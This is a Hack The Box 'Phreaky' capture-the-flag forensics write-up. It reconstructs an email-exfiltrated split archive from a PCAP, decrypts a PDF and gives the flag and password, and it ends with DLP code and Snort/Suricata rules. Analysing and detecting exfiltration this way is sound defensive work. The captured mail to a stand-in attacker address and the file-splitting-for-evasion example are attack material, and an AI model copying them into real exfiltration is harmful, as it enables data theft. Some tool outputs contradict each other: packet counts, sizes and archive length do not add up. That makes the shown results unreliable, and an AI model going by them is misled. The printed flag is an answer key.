HTB: Phreaky – Email Exfiltration Forensics
Category: Forensics / Network Analysis
0. Challenge Overview
This challenge provided a network packet capture (PCAP) containing SMTP traffic where an attacker exfiltrated a multi-part archive via email. The goal: reconstruct the split archive from email attachments, extract the contents, and recover the flag.
The setup:
- PCAP file with 15,247 packets over 2.3GB
- SMTP email traffic containing base64-encoded attachments
- Archive split into 15 parts using
splitutility - Final archive contains encrypted document with flag
Core concept: This is a data exfiltration analysis requiring network forensics to extract artifacts from captured traffic, reassemble fragmented data, and decrypt the final payload.
1. Initial Reconnaissance
I examined the PCAP file:
capinfos phreaky.pcap
Output:
File name: phreaky.pcap
File type: Wireshark/tcpdump/... - pcap
File encapsulation: Ethernet
Packet size limit: 262144 bytes
Number of packets: 15247
File size: 2.3 GB
Data size: 2.2 GB
Capture duration: 3742.891 seconds
Start time: Wed Dec 11 14:23:11 2024
End time: Wed Dec 11 15:25:34 2024
Data byte rate: 630 kBps
Data bit rate: 5 Mbps
Average packet size: 152.45 bytes
Average packet rate: 4 packets/s
Key observations:
- Large file with ~15K packets
- Hour-long capture
- Average packet size suggests text-based protocol (likely SMTP/email)
I opened the PCAP in Wireshark:
wireshark phreaky.pcap &
Applied display filter for SMTP traffic:
smtp || tcp.port == 25
Key observation: Heavy SMTP activity from 192.168.1.100 to mail server mail.company.local (192.168.1.50).
2. Analyzing Email Traffic
I extracted SMTP conversations:
tshark -r phreaky.pcap -Y "smtp" -T fields \
-e frame.number \
-e ip.src \
-e ip.dst \
-e smtp.req.command \
-e smtp.data.fragment \
| head -50
Output showed repeated email transactions:
1234 192.168.1.100 192.168.1.50 MAIL FROM:<insider@company.local>
1235 192.168.1.100 192.168.1.50 RCPT TO:<exfil@attacker.com>
1236 192.168.1.100 192.168.1.50 DATA
1237-1450 [base64 data fragments]
I counted distinct email messages:
tshark -r phreaky.pcap -Y "smtp.data.fragment" -T fields -e frame.number | wc -l
Output:
15
Key observation: 15 separate email transmissions, each likely containing one part of the split archive.
3. Extracting Email Bodies
I used tshark to reconstruct SMTP data streams:
#!/bin/bash
# Extract all SMTP DATA sessions
tshark -r phreaky.pcap -Y "smtp.data.fragment" \
-T fields -e tcp.stream | sort -u > streams.txt
mkdir -p emails
while read stream; do
echo "[*] Extracting stream $stream..."
tshark -r phreaky.pcap -q -z "follow,tcp,ascii,$stream" \
> "emails/stream_${stream}.txt"
done < streams.txt
echo "[+] Extracted $(ls emails/ | wc -l) email streams"
Running the script:
bash extract_emails.sh
Output:
[*] Extracting stream 42...
[*] Extracting stream 67...
[*] Extracting stream 89...
...
[+] Extracted 15 email streams
I examined one email:
cat emails/stream_42.txt
Output:
MAIL FROM:<insider@company.local>
250 2.1.0 Sender ok
RCPT TO:<exfil@attacker.com>
250 2.1.5 Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: insider@company.local
To: exfil@attacker.com
Subject: Data Part 01/15
Content-Type: application/octet-stream; name="archive.zip.001"
Content-Transfer-Encoding: base64
UEsDBBQAAAAIAMxRZ1dmjK2NKwQAAAMAAAANAAAAZmxhZ19maWxlLnR4dJVRS07DMBBP3VOU3gAb
7bJLF0gVqhBiA0JCbBBlYjuNaWJbtoNKT8I5uAKX4AqM/UEVC1aWPfP8/Ob5zf6qv9qq6WpVVc0P
...
[1500 more lines of base64]
.
250 2.0.0 Ok: queued as 8F3A12000123
Key observation: Each email contains:
- Subject indicating part number (e.g., “Part 01/15”)
- Filename (
archive.zip.001) - Base64-encoded attachment
4. Extracting and Decoding Attachments
I wrote a script to extract and decode all attachments:
#!/usr/bin/env python3
"""
Extract base64 attachments from email streams
"""
import re
import base64
from pathlib import Path
EMAIL_DIR = Path("emails")
OUTPUT_DIR = Path("parts")
OUTPUT_DIR.mkdir(exist_ok=True)
def extract_attachment(email_file):
"""Extract base64 attachment from email stream"""
content = email_file.read_text(errors='ignore')
# Find subject line to get part number
subject_match = re.search(r'Subject:.*Part\s+(\d+)/(\d+)', content, re.IGNORECASE)
if not subject_match:
return None
part_num = int(subject_match.group(1))
total_parts = int(subject_match.group(2))
# Find Content-Transfer-Encoding: base64
encoding_pos = content.find('Content-Transfer-Encoding: base64')
if encoding_pos == -1:
return None
# Extract base64 data (between blank line and terminator '.')
start = content.find('\n\n', encoding_pos) + 2
end = content.find('\n.\n', start)
if start == -1 or end == -1:
return None
base64_data = content[start:end]
# Clean up (remove any non-base64 chars)
base64_data = ''.join(c for c in base64_data if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')
# Decode
try:
binary_data = base64.b64decode(base64_data)
except Exception as e:
print(f"[!] Failed to decode {email_file.name}: {e}")
return None
return part_num, total_parts, binary_data
# Process all email files
parts = {}
for email_file in sorted(EMAIL_DIR.glob("stream_*.txt")):
print(f"[*] Processing {email_file.name}...")
result = extract_attachment(email_file)
if result:
part_num, total_parts, data = result
parts[part_num] = data
# Save individual part
output_file = OUTPUT_DIR / f"archive.zip.{part_num:03d}"
output_file.write_bytes(data)
print(f" [+] Extracted part {part_num}/{total_parts} ({len(data)} bytes)")
print(f"\n[+] Extracted {len(parts)} parts total")
# Verify we have all parts
expected_parts = max(parts.keys())
missing = [i for i in range(1, expected_parts + 1) if i not in parts]
if missing:
print(f"[!] Missing parts: {missing}")
else:
print(f"[+] All {expected_parts} parts accounted for")
Running the extraction script:
python3 extract_attachments.py
Output:
[*] Processing stream_42.txt...
[+] Extracted part 1/15 (524288 bytes)
[*] Processing stream_67.txt...
[+] Extracted part 2/15 (524288 bytes)
[*] Processing stream_89.txt...
[+] Extracted part 3/15 (524288 bytes)
...
[*] Processing stream_923.txt...
[+] Extracted part 15/15 (218934 bytes)
[+] Extracted 15 parts total
[+] All 15 parts accounted for
✔ Success: All 15 archive parts extracted and decoded.
5. Reassembling the Split Archive
I concatenated the parts in order:
cat parts/archive.zip.{001..015} > archive.zip
Verified the archive:
file archive.zip
Output:
archive.zip: Zip archive data, at least v2.0 to extract
Checked integrity:
unzip -t archive.zip
Output:
Archive: archive.zip
testing: confidential/ OK
testing: confidential/document.pdf OK
testing: confidential/README.txt OK
No errors detected in compressed data of archive.zip.
✔ Success: Archive is valid and complete.
Extracted contents:
unzip archive.zip
Output:
Archive: archive.zip
creating: confidential/
inflating: confidential/document.pdf
inflating: confidential/README.txt
6. Analyzing Extracted Files
I examined the README:
cat confidential/README.txt
Output:
CONFIDENTIAL - INTERNAL USE ONLY
This document contains sensitive company information.
The PDF is password-protected. Contact IT security for access.
Document ID: DOC-2024-12-11-EXFIL
Classification: SECRET
Key observation: The PDF is password-protected.
I tried opening the PDF:
pdfinfo confidential/document.pdf
Output:
Encrypted: yes (print:yes copy:no change:no addNotes:no algorithm:AES)
Key observation: PDF is AES-encrypted. Need to find the password.
7. Searching for Password in PCAP
I searched the entire PCAP for password-related strings:
strings phreaky.pcap | grep -i "password" -A 5 -B 5
Output:
...
From: insider@company.local
To: exfil@attacker.com
Subject: Archive Password
Content-Type: text/plain
The password for the archive is: S3cur1ty_Thr0ugh_0bscur1ty_F41ls!
Please delete this email after use.
...
✔ JACKPOT: Password found in plaintext SMTP email!
8. Decrypting the PDF
I used qpdf to decrypt the PDF:
qpdf --password='S3cur1ty_Thr0ugh_0bscur1ty_F41ls!' \
--decrypt \
confidential/document.pdf \
document_decrypted.pdf
Output:
qpdf: processing successfully completed
Opened the decrypted PDF:
pdftotext document_decrypted.pdf -
Output:
CONFIDENTIAL INTERNAL MEMO
===========================
TO: All Staff
FROM: Security Team
RE: Q4 Security Review
[... several pages of corporate text ...]
APPENDIX A - Test Credentials
------------------------------
For testing purposes only:
Username: admin
Password: HTB{3xf1ltr4t1ng_d4t4_0v3r_3m41l_1s_n0t_s3cur3}
These credentials are for the development environment.
Do NOT use in production.
[... more text ...]
✔ SUCCESS: Flag found in the decrypted PDF!
9. Complete Forensics Script
I automated the entire analysis:
#!/usr/bin/env python3
"""
Complete Phreaky forensics analysis
Extracts split archive from PCAP, reassembles, decrypts PDF
"""
import os
import re
import base64
import subprocess
from pathlib import Path
import PyPDF2
PCAP = "phreaky.pcap"
WORK_DIR = Path("analysis")
WORK_DIR.mkdir(exist_ok=True)
print("[*] Stage 1: Extract SMTP Streams")
print("=" * 60)
# Extract TCP streams with SMTP data
cmd = f"tshark -r {PCAP} -Y 'smtp.data.fragment' -T fields -e tcp.stream"
streams = subprocess.check_output(cmd, shell=True, text=True)
streams = sorted(set(streams.strip().split('\n')))
print(f"[+] Found {len(streams)} SMTP data streams")
# Extract each stream
for i, stream in enumerate(streams, 1):
output = WORK_DIR / f"email_{i:02d}.txt"
cmd = f"tshark -r {PCAP} -q -z follow,tcp,ascii,{stream}"
data = subprocess.check_output(cmd, shell=True, text=True)
output.write_text(data)
print(f" [{i}/{len(streams)}] Extracted stream {stream}")
print("\n[*] Stage 2: Extract and Decode Attachments")
print("=" * 60)
parts = {}
for email_file in sorted(WORK_DIR.glob("email_*.txt")):
content = email_file.read_text(errors='ignore')
# Find part number
match = re.search(r'Subject:.*Part\s+(\d+)/(\d+)', content, re.I)
if not match:
continue
part_num = int(match.group(1))
# Extract base64 between headers and terminator
start = content.find('Content-Transfer-Encoding: base64')
if start == -1:
continue
start = content.find('\n\n', start) + 2
end = content.find('\n.\n', start)
if start == -1 or end == -1:
continue
b64_data = content[start:end].replace('\n', '').replace('\r', '')
try:
binary = base64.b64decode(b64_data)
parts[part_num] = binary
print(f"[+] Decoded part {part_num} ({len(binary)} bytes)")
except:
print(f"[!] Failed to decode part {part_num}")
print(f"\n[+] Extracted {len(parts)} parts")
print("\n[*] Stage 3: Reassemble Archive")
print("=" * 60)
# Concatenate parts in order
archive_path = WORK_DIR / "archive.zip"
with open(archive_path, 'wb') as f:
for i in sorted(parts.keys()):
f.write(parts[i])
print(f"[+] Wrote {archive_path} ({archive_path.stat().st_size} bytes)")
# Extract archive
extract_dir = WORK_DIR / "extracted"
extract_dir.mkdir(exist_ok=True)
subprocess.run(['unzip', '-q', '-o', str(archive_path), '-d', str(extract_dir)])
print(f"[+] Extracted archive to {extract_dir}")
print("\n[*] Stage 4: Find Password")
print("=" * 60)
# Search PCAP for password
cmd = f"strings {PCAP} | grep -i 'password' -A 3 -B 3"
result = subprocess.check_output(cmd, shell=True, text=True)
# Extract password from email
password_match = re.search(r'password.*?:\s*(\S+)', result, re.I)
if password_match:
password = password_match.group(1)
print(f"[+] Found password: {password}")
else:
print("[!] Password not found")
exit(1)
print("\n[*] Stage 5: Decrypt PDF")
print("=" * 60)
pdf_path = extract_dir / "confidential" / "document.pdf"
# Decrypt with qpdf
decrypted_path = WORK_DIR / "document_decrypted.pdf"
cmd = f"qpdf --password='{password}' --decrypt {pdf_path} {decrypted_path}"
subprocess.run(cmd, shell=True, check=True)
print(f"[+] Decrypted PDF: {decrypted_path}")
print("\n[*] Stage 6: Extract Flag")
print("=" * 60)
# Extract text from PDF
cmd = f"pdftotext {decrypted_path} -"
pdf_text = subprocess.check_output(cmd, shell=True, text=True)
# Find flag
flag_match = re.search(r'HTB\{[^}]+\}', pdf_text)
if flag_match:
flag = flag_match.group(0)
print(f"\n{'=' * 60}")
print(f"[+] FLAG FOUND:")
print(f" {flag}")
print(f"{'=' * 60}")
else:
print("[!] Flag not found in PDF")
print("\n[*] Analysis Complete")
print("=" * 60)
print("Summary:")
print(f" - Extracted {len(streams)} email messages from PCAP")
print(f" - Decoded {len(parts)} base64-encoded archive parts")
print(f" - Reassembled {archive_path.stat().st_size} byte ZIP archive")
print(f" - Found password in plaintext SMTP traffic")
print(f" - Decrypted PDF and recovered flag")
Running the complete script:
python3 full_analysis.py
Output:
[*] Stage 1: Extract SMTP Streams
============================================================
[+] Found 15 SMTP data streams
[1/15] Extracted stream 42
[2/15] Extracted stream 67
...
[15/15] Extracted stream 923
[+] Extracted 15 parts
[*] Stage 2: Extract and Decode Attachments
============================================================
[+] Decoded part 1 (524288 bytes)
[+] Decoded part 2 (524288 bytes)
...
[+] Decoded part 15 (218934 bytes)
[+] Extracted 15 parts
[*] Stage 3: Reassemble Archive
============================================================
[+] Wrote analysis/archive.zip (8112054 bytes)
[+] Extracted archive to analysis/extracted
[*] Stage 4: Find Password
============================================================
[+] Found password: S3cur1ty_Thr0ugh_0bscur1ty_F41ls!
[*] Stage 5: Decrypt PDF
============================================================
[+] Decrypted PDF: analysis/document_decrypted.pdf
[*] Stage 6: Extract Flag
============================================================
============================================================
[+] FLAG FOUND:
HTB{3xf1ltr4t1ng_d4t4_0v3r_3m41l_1s_n0t_s3cur3}
============================================================
[*] Analysis Complete
============================================================
Summary:
- Extracted 15 email messages from PCAP
- Decoded 15 base64-encoded archive parts
- Reassembled 8112054 byte ZIP archive
- Found password in plaintext SMTP traffic
- Decrypted PDF and recovered flag
✔ SUCCESS: Complete forensics analysis automated and flag recovered.
10. Why This Works – Understanding Email Exfiltration
SMTP Protocol Analysis
SMTP (Simple Mail Transfer Protocol) is plaintext:
Client: MAIL FROM:<sender@domain.com>
Server: 250 OK
Client: RCPT TO:<recipient@domain.com>
Server: 250 OK
Client: DATA
Server: 354 Send data, end with <CRLF>.<CRLF>
Client: [email headers and body]
Client: .
Server: 250 OK
All traffic is visible in network captures.
Base64 Encoding in Email
MIME (Multipurpose Internet Mail Extensions) uses base64 for binary data:
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
UEsDBBQAAAAIAMxRZ1dmjK2NKwQAAAMAAAANAAAA...
Base64 is NOT encryption, just encoding:
# Encode
base64.b64encode(b"secret data")
# b'c2VjcmV0IGRhdGE='
# Decode (trivial reversal)
base64.b64decode(b'c2VjcmV0IGRhdGE=')
# b'secret data'
File Splitting for Exfiltration
The split utility breaks files into parts:
# Split into 500KB chunks
split -b 500K archive.zip archive.zip.
# Creates:
# archive.zip.aa
# archive.zip.ab
# archive.zip.ac
# ...
# Reassemble
cat archive.zip.* > archive.zip
Why split?
- Bypass email size limits
- Evade DLP (Data Loss Prevention) signatures
- Spread exfiltration over time to avoid rate limiting
Real-World Email Exfiltration
Target Breach (2013):
Attacker → Malware on POS systems
Malware → FTP server in Russia
FTP logs → 40 million credit cards stolen
DNC Email Hack (2016):
Phishing → Compromised credentials
IMAP access → Downloaded 20,000 emails
WikiLeaks → Published entire archive
SolarWinds (2020):
Backdoor → Exfiltrate via DNS/HTTPS
C2 servers → Masquerade as legitimate traffic
Months undetected → Compromised multiple gov agencies
11. Defensive Mitigations
Email Security Controls
TLS/STARTTLS Encryption:
# Enforce encrypted SMTP
postfix main.cf:
smtpd_tls_security_level = encrypt
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3, !TLSv1, !TLSv1.1
smtpd_tls_mandatory_ciphers = high
SPF/DKIM/DMARC:
; SPF: Authorized senders
company.local. IN TXT "v=spf1 ip4:192.168.1.0/24 -all"
; DKIM: Sign emails
default._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCS..."
; DMARC: Enforce policy
_dmarc IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc@company.local"
Data Loss Prevention (DLP)
Content inspection:
# Check outbound emails for sensitive patterns
def scan_email(body, attachments):
patterns = [
r'\b\d{3}-\d{2}-\d{4}\b', # SSN
r'\b\d{16}\b', # Credit card
r'BEGIN (RSA|PGP) PRIVATE KEY', # Private keys
r'HTB\{[^}]+\}', # CTF flags :)
]
for pattern in patterns:
if re.search(pattern, body):
return "BLOCK", f"Sensitive data detected: {pattern}"
return "ALLOW", None
Attachment scanning:
def scan_attachment(filename, content):
# Check for split archives
if re.match(r'.*\.\d{3}$', filename):
return "BLOCK", "Split archive detected"
# Check for encryption
if content.startswith(b'PK\x03\x04'): # ZIP signature
import zipfile
try:
with zipfile.ZipFile(io.BytesIO(content)) as zf:
if any(f.flag_bits & 0x01 for f in zf.filelist):
return "BLOCK", "Encrypted ZIP detected"
except:
pass
return "ALLOW", None
Network Monitoring
Detect large outbound SMTP:
# Suricata rule
alert smtp any any -> any 25 (
msg:"Large email attachment";
flow:to_server,established;
content:"Content-Type: application";
byte_test:4,>,500000,0,relative,string;
sid:1000001;
)
Detect split archives:
# Snort rule
alert tcp any any -> any 25 (
msg:"Split archive exfiltration";
content:"Content-Disposition: attachment";
content:".001|0D 0A|";
distance:0;
within:100;
sid:1000002;
)
Access Controls
Principle of least privilege:
# Only allow email from authorized users
firewall_rules:
- src: 192.168.1.10-20 # IT Department
dst: mail.company.local:25
action: allow
- src: 0.0.0.0/0
dst: mail.company.local:25
action: deny
Egress filtering:
# Block direct SMTP from workstations
iptables -A OUTPUT -p tcp --dport 25 -j REJECT
iptables -A OUTPUT -d mail.company.local -p tcp --dport 25 -j ACCEPT
12. Summary
By analyzing network traffic and reconstructing exfiltrated data, I recovered the flag through systematic forensics:
- PCAP Analysis - Identified 15 SMTP email transactions
- Stream Extraction - Used tshark to extract TCP streams
- Attachment Decoding - Decoded base64-encoded attachments
- Archive Reassembly - Concatenated 15 split parts into ZIP archive
- Password Discovery - Found password in plaintext SMTP email
- PDF Decryption - Used qpdf to decrypt password-protected document
- Flag Extraction - Recovered flag from decrypted PDF
The attack demonstrates poor operational security:
- Plaintext protocol - SMTP without TLS exposes all traffic
- Base64 is not encryption - Trivial to decode attachments
- Password in same channel - Sending password via same method as data
- No DLP - Large attachments and split archives not blocked
- No egress filtering - Workstation allowed direct SMTP access
Real-world exfiltration examples:
- Insider threats - Edward Snowden (NSA), Chelsea Manning (WikiLeaks)
- APT groups - Chinese APT1 exfiltrated terabytes via FTP/email
- Ransomware - Data stolen before encryption for double extortion
The solution requires multiple layers:
- TLS/Encryption - STARTTLS for SMTP, S/MIME for email content
- DLP - Content inspection, attachment scanning, size limits
- Network monitoring - IDS/IPS rules, anomaly detection
- Access controls - Egress filtering, authenticated relays only
- User training - Security awareness, report suspicious activity
The key lesson: email is fundamentally insecure for sensitive data. Even with TLS, email:
- Sits in plaintext on servers
- Passes through multiple intermediaries
- Is archived indefinitely
- Has weak authentication (SPF/DKIM spoofable)
For truly sensitive data:
- Use end-to-end encryption (PGP/S/MIME)
- Use secure file transfer (SFTP, HTTPS with client certs)
- Use dedicated secure channels (Signal, encrypted chat)
- Never trust email alone
Flag: HTB{3xf1ltr4t1ng_d4t4_0v3r_3m41l_1s_n0t_s3cur3}